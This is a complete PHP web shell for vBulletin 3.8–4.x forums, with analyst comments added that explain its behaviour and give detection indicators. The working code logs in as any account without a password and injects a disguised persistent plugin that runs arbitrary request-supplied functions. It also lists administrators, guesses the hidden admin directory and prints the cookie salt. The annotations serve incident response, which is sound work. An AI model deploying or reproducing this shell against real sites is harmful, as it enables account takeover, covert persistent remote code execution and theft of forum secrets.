- <?php
- /**
- * vBulletin 3.8.x-4.x Login Shell
- * Author: JB (jb@p0wersurge.com)
- * www.p0wersurge.com
- * 13/01/2014 (updated 26/07/2015)
- * Version 1.9
- */
- // ANALYST NOTE: post-compromise web shell for a vBulletin forum. No access check is visible in
- // this file: every action below runs for whichever request reaches the script. It only works when
- // it already sits on the web server next to global.php, so finding it means file-write access to
- // the forum was lost before it was used. Request markers visible in this file: do=login (with
- // username=) and do=injectplugin.
- #chdir('../');
- // Loads the forum bootstrap relative to the current directory. $vbulletin, TABLE_PREFIX,
- // COOKIE_PREFIX, COOKIE_SALT and DIR are used below but not defined here; presumably they come
- // from this include.
- require_once('./global.php');
- // PHP_SELF is stored as-is and later echoed into HTML attributes without escaping.
- define('SELF', $_SERVER['PHP_SELF']);
- // Error display and error reporting are both switched off for the rest of the request, so
- // failures in this script are neither shown nor reported.
- @ini_set('display_errors', false);
- error_reporting(0);
- // Picks one of two definitions of verify_authentication2() from the first character of the
- // forum's version string: greater than 3 takes the first branch, anything else the second.
- // ANALYST NOTE: both variants are the authentication bypass. They take a username and nothing
- // else, load the account row by that username, and never compare the stored password or salt
- // with any supplied value, so every existing username "verifies".
- if(substr($vbulletin->versionnumber, 0, 1) > 3)
- {
- // Compared further down with each administrator's adminpermissions value to label an account
- // "(full permissions)" in the listing.
- $fullperms = '16744444';
- function verify_authentication2($username)
- {
- global $vbulletin;
- $username = strip_blank_ascii($username, ' ');
- // Overwrites $vbulletin->userinfo with the looked-up row; a non-empty row is the only condition
- // for success.
- if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
- {
- // Cookie issuance is delegated to set_authentication_cookies(), which is defined outside this file.
- set_authentication_cookies($cookieuser);
- $return_value = true;
- // Evaluates whatever code the forum has registered on its login_verify_success hook.
- ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
- return $return_value;
- }
- // No row for that username: report failure after running the matching failure hook.
- $return_value = false;
- ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
- return $return_value;
- }
- }
- else
- {
- // Same role as in the other branch, with a different value for this version line.
- $fullperms = '491516';
- function verify_authentication2($username)
- {
- global $vbulletin;
- $username = strip_blank_ascii($username, ' ');
- // Overwrites $vbulletin->userinfo with the looked-up row; a non-empty row is the only condition
- // for success.
- if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
- {
- if ($vbulletin->GPC[COOKIE_PREFIX . 'userid'] AND $vbulletin->GPC[COOKIE_PREFIX . 'userid'] != $vbulletin->userinfo['userid'])
- {
- // we have a cookie from a user and we're logging in as
- // a different user and we're not going to store a new cookie,
- // so let's unset the old one
- vbsetcookie('userid', '', true, true, true);
- vbsetcookie('password', '', true, true, true);
- }
- // The cookies are built only from server-side values: the row's userid, and md5 of the stored
- // password field concatenated with COOKIE_SALT. Nothing the requester supplied goes into them.
- // NOTE(review): if the forum validates login cookies with the same formula, a cookie issued
- // here presumably stays usable until the stored password hash or COOKIE_SALT changes - confirm,
- // and account for it during cleanup.
- vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
- vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
- $return_value = true;
- // Evaluates whatever code the forum has registered on its login_verify_success hook.
- ($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
- return $return_value;
- }
- // No row for that username: report failure after running the matching failure hook.
- $return_value = false;
- ($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
- return $return_value;
- }
- }
- // Locates the admin control panel directory in two ways: the configured name, and a scan of the
- // current directory for any subdirectory that is not in $known and contains adminlog.php.
- // ANALYST NOTE: the scan is a local filesystem check, so renaming the admin directory does not
- // hide it from code that is already running on the server.
- $guess = array();
- // Directory names that are skipped by the scan below.
- $known = array(
- 'archive',
- 'clientscript',
- 'cpstyles',
- 'customavatars',
- 'customgroupicons',
- 'customprofilepics',
- 'attach',
- 'forumrunner',
- 'images',
- 'includes',
- 'install',
- 'packages',
- 'signaturepics',
- 'store_sitemap',
- 'vb'
- );
- // Configured admin directory name, and the URL built from the bburl option plus that name.
- $admindir = $vbulletin->config['Misc']['admincpdir'];
- $complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
- $results = scandir('.');
- foreach ($results as $result) {
- if ($result == '.' or $result == '..') continue;
- if (is_dir('./' . $result)) {
- if(in_array($result, $known)) continue;
- // Presence of adminlog.php is the only test applied to a candidate directory.
- if(@file_exists($result . '/adminlog.php'))
- {
- $guess[] = $result;
- } else {
- continue;
- }
- }
- }
- // do=login: impersonation entry point. The only inputs read are do and username; no password,
- // token or other credential is taken from the request.
- // ANALYST NOTE: the form and links on this page send these values as GET parameters, so use of
- // this branch would normally show up in access logs as do=login&username=... on the shell's path.
- if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username']))
- {
- require_once(DIR . '/includes/functions_login.php');
- $username = $_REQUEST['username'];
- // The supplied value is matched against either the username or the userid column (escaped with
- // the forum's escape_string), and resolved to the account's username.
- $q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
- $query = $vbulletin->db->query_first($q);
- if($query['username'] != null)
- {
- // verify_authentication2() succeeds for any existing username (it performs no password check).
- if(verify_authentication2($query['username']))
- {
- // These three helpers are defined outside this file. NOTE(review): by name they presumably
- // clear failed-login strikes, create the session ('cplogin' suggesting a control panel login)
- // and redirect into the forum - confirm against the forum's functions_login.php.
- exec_unstrike_user($query['username']);
- process_new_login('cplogin', true, null);
- do_login_redirect();
- }
- else
- {
- die('Verify failed');
- }
- }
- else
- {
- die('User not found.');
- }
- }
- elseif($_REQUEST['do'] == 'injectplugin')
- {
- // do=injectplugin: persistence. Writes a new row into the forum's plugin table, so the code it
- // stores lives in the database and is not removed by deleting this file.
- // ANALYST NOTE: when hunting, check the plugin table for the values set below (hookname
- // global_complete, title 'AJAX Refresh Speed') and, more reliably, for any phpcode that calls a
- // request parameter as a function. Treat the title as a weak indicator and the code as the strong one.
- $products = array();
- $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
- if($vbulletin->db->num_rows($query) > 0)
- {
- while($product = $vbulletin->db->fetch_array($query))
- {
- $productinfo = array();
- $productinfo['productid'] = $product['productid'];
- $productinfo['title'] = $product['title'];
- $productinfo['version'] = $product['version'];
- $productinfo['active'] = $product['active'];
- $productinfo['url'] = $product['url'];
- $products[] = $productinfo;
- }
- }
- // choose a random product if productcount > 0 else inject into vbulletin
- $productcount = count($products);
- $plugin['title'] = 'AJAX Refresh Speed';
- $plugin['hookname'] = 'global_complete';
- // The stored code calls the function named by request parameter x with request parameter y as
- // its argument, with no check on either value. NOTE(review): presumably the forum runs it
- // wherever it fires the global_complete hook - confirm for the installed version.
- $plugin['phpcode'] = 'if(isset($_REQUEST[\'x\'])){$_REQUEST[\'x\']($_REQUEST[\'y\']);}';
- if(intval($productcount) > 0)
- {
- // failsafe incase product is disabled - we should only ever be injecting into an enabled product, or our injection is worthless
- // optional really, you can just make it insert into vbulletin itself but that's not really as covert as i'd like
- // The row is filed under the product id of a randomly drawn installed product, so it can
- // appear to belong to a legitimate add-on. The goto repeats the draw until the drawn entry
- // is active.
- retrymtrand:
- $rand = mt_rand(0, intval($productcount));
- if($products[$rand]['active'])
- {
- $plugin['product'] = $products[$rand]['productid'];
- }
- else
- {
- goto retrymtrand;
- }
- }
- else
- {
- $plugin['product'] = 'vbulletin';
- }
- $plugin['devkey'] = '';
- $plugin['active'] = '1';
- $plugin['executionorder'] = '5';
- $vbulletin->db->query("
- INSERT INTO " . TABLE_PREFIX . "plugin
- (
- hookname,
- title,
- phpcode,
- product,
- active,
- executionorder
- )
- VALUES
- (
- '" . $plugin['hookname'] . "',
- '" . $plugin['title'] . "',
- '" . $vbulletin->db->escape_string($plugin['phpcode']) . "',
- '" . $vbulletin->db->escape_string($plugin['product']) . "',
- " . intval($plugin['active']) . ",
- " . intval($plugin['executionorder']) . "
- )
- ");
- $pluginid = $vbulletin->db->insert_id();
- // update the datastore
- // NOTE(review): because the hook datastore is rebuilt here, cleanup presumably needs both the
- // plugin row deleted and the datastore rebuilt again - confirm for the installed version.
- vBulletinHook::build_datastore($db);
- ?>
- <h1>Plugin <?php echo $pluginid; ?> created on global_complete!</h1>
- <pre>
- <?php echo print_r($plugin); ?>
- </pre>
- <a href="<?php echo SELF; ?>">Go back</a>
- <?php
- }
- else
- {
- // Default view (no recognised do value): the operator page. It gathers administrator accounts
- // and installed products, then renders them with the links that drive the two branches above.
- // Usergroups whose adminpermissions equals '3'; this array is filled here but not read again
- // in this file.
- $admin_usergroups = array();
- $admin_usergroups_query = $vbulletin->db->query("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup WHERE adminpermissions = '3'");
- while($admin_usergroup = $vbulletin->db->fetch_array($admin_usergroups_query))
- {
- $admin_usergroups[] = $admin_usergroup['usergroupid'];
- }
- // Every row of the administrator table, joined in code with the account's userid, username and
- // marked-up username.
- $admins = array();
- $query = $vbulletin->db->query("SELECT userid,adminpermissions FROM " . TABLE_PREFIX . "administrator");
- while($user = $vbulletin->db->fetch_array($query))
- {
- $userinfo = fetch_userinfo($user['userid']);
- $userarray = array();
- $userarray['userid'] = $userinfo['userid'];
- $userarray['username'] = $userinfo['username'];
- $userarray['musername'] = fetch_musername($userinfo);
- $userarray['adminpermissions'] = $user['adminpermissions'];
- $admins[] = $userarray;
- }
- // Installed products with their version, active flag and URL.
- $products = array();
- $query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
- if($vbulletin->db->num_rows($query) > 0)
- {
- while($product = $vbulletin->db->fetch_array($query))
- {
- $productinfo = array();
- $productinfo['productid'] = $product['productid'];
- $productinfo['title'] = $product['title'];
- $productinfo['version'] = $product['version'];
- $productinfo['active'] = $product['active'];
- $productinfo['url'] = $product['url'];
- $products[] = $productinfo;
- }
- }
- // ANALYST NOTE: the markup below prints TABLE_PREFIX, COOKIE_PREFIX and COOKIE_SALT to the
- // requester, along with administrator usernames and the installed product list. If this page
- // was ever served, treat COOKIE_SALT as disclosed. Usernames, product titles, versions and URLs
- // are echoed without HTML escaping.
- ?>
- <h1>vBulletin Login Shell | CP Login (<?php echo $vbulletin->options['bbtitle']; ?>) (vB<?php echo $vbulletin->versionnumber; ?>)</h1>
- <hr />
- <form action="<?php echo SELF; ?>" method="get">
- <input type="hidden" name="do" value="login" />
- <input type="text" name="username" value="" />
- <input type="submit" name="login" value="Login as user" />
- </form>
- <hr />
- <p>Admins found: <?php echo count($admins); ?></p>
- <p><?php foreach($admins as $admin){ echo '<a href="' . SELF . '?do=login&username=' . $admin['username'] . '">' . $admin['musername'] . '</a>' . (($admin['adminpermissions'] == $fullperms) ? ' (full permissions)' : '') . ' ';} ?></p>
- <hr />
- <p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $admindir; ?></a></p>
- <p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
- <hr />
- <a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a>
- <hr />
- <p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
- <p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
- <p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
- <hr />
- <?php if(count($products) > 0) { ?>
- <h3>Installed Products</h3>
- <ul>
- <?php
- // One list item per product: green when its active flag is set, red otherwise; the title is
- // wrapped in a link when the product has a non-empty URL.
- foreach($products as $product)
- {
- if($product['active'])
- {
- $color = 'green';
- }
- else
- {
- $color = 'red';
- }
- echo '<li><span style="color: ' . $color . ';">' . ((trim($product['url']) != null) ? '<a style="color: ' . $color . '" href="' . trim($product['url']) . '" target="_blank">' : '') . $product['title'] . ((trim($product['url']) != null) ? '</a>' : '') . ' (' . $product['version'] . ')</span></li>';
- }
- ?>
- </ul>
- <hr />
- <?php } ?>
- <h6>Written by <a href="https://twitter.com/xijailbreakx" target="_blank">@xijailbreakx</a>. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful).</h6>
- <?php
- }
- ?>